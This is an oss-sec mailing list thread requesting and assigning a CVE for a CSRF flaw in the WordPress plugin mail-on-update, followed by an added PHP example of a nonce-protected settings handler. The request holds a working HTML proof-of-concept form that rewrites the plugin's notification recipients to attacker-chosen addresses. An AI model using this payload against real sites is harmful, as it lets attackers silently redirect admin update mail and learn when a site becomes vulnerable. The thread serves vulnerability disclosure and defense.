oss-sec mailing list archives
Re: CVE request: WordPress plugin mail-on-update CSRF
From: Kurt Seifried <kseifried () redhat com>
Date: Sat, 18 May 2013 00:58:07 -0600
On 05/16/2013 08:06 AM, Henri Salo wrote:
> Hello,
>
> Can I get a 2013 CVE for the WordPress plugin mail-on-update CSRF vulnerability? PoC for "List of alternative recipients" below. Tested 5.1.0 version.
>
> Homepage: http://wordpress.org/extend/plugins/mail-on-update/
> Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/
>
> <html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update" method="post" class="buttom-primary">
> <input name="mailonupdate_mailto" type="hidden" value="example0 () example com example1 () example com example2 () example com example3 () example com example4 () example com example5 () example com example6 () example com example7 () example com example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" />
> <input name="submit" type="submit" value="Save"/></form></html>
>
> If an attacker adds a random email to that form, the default user won't get emails, and the attacker might be interested in receiving these, as the email contains information about available plugin updates.
>
> ---
> Henri Salo

Even better, the remote site then notifies you when it becomes vulnerable to a security flaw, or you can use it to spam people, or all sorts of other annoying things.

Please use CVE-2013-2107 for this issue.

-- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
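
A CSRF of this kind succeeds when the settings POST is accepted without a per-request token. As an added example (not the plugin's own code and not part of the messages above), a settings handler using WordPress's nonce API would reject such a cross-site form. The function names, the nonce names and the assumption that the recipients are stored in an option called mailonupdate_mailto (taken from the form field in the PoC) are hypothetical:

```php
<?php
// Added example: hypothetical settings handler, not the plugin's real code.
// Assumption: recipients are stored in an option named after the PoC's form
// field (mailonupdate_mailto). Function and nonce names are invented here.

const MOU_NONCE_ACTION = 'mou_save_settings'; // hypothetical
const MOU_NONCE_FIELD  = 'mou_nonce';         // hypothetical

// Render the form: wp_nonce_field() emits a hidden token bound to the
// logged-in user and to this action, which another origin cannot read.
function mou_render_settings_form() {
    $current = get_option( 'mailonupdate_mailto', '' );
    echo '<form method="post" action="">';
    wp_nonce_field( MOU_NONCE_ACTION, MOU_NONCE_FIELD );
    echo '<textarea name="mailonupdate_mailto">' . esc_textarea( $current ) . '</textarea>';
    submit_button( 'Save' );
    echo '</form>';
}

// Handle the POST: refuse anything lacking the capability or a valid nonce.
function mou_handle_settings_post() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['mailonupdate_mailto'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request when the nonce is missing or invalid, which is the
    // case for a form auto-submitted from a third-party page.
    check_admin_referer( MOU_NONCE_ACTION, MOU_NONCE_FIELD );

    // Store only syntactically valid addresses, one per line.
    $raw   = wp_unslash( $_POST['mailonupdate_mailto'] );
    $valid = array();
    foreach ( preg_split( '/\s+/', $raw, -1, PREG_SPLIT_NO_EMPTY ) as $addr ) {
        $addr = sanitize_email( $addr );
        if ( is_email( $addr ) ) {
            $valid[] = $addr;
        }
    }
    update_option( 'mailonupdate_mailto', implode( "\n", $valid ) );
}
add_action( 'admin_init', 'mou_handle_settings_post' );
```

The capability check and the nonce check are independent: the first limits who may change the recipient list, the second ensures the change was initiated from the plugin's own settings page.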
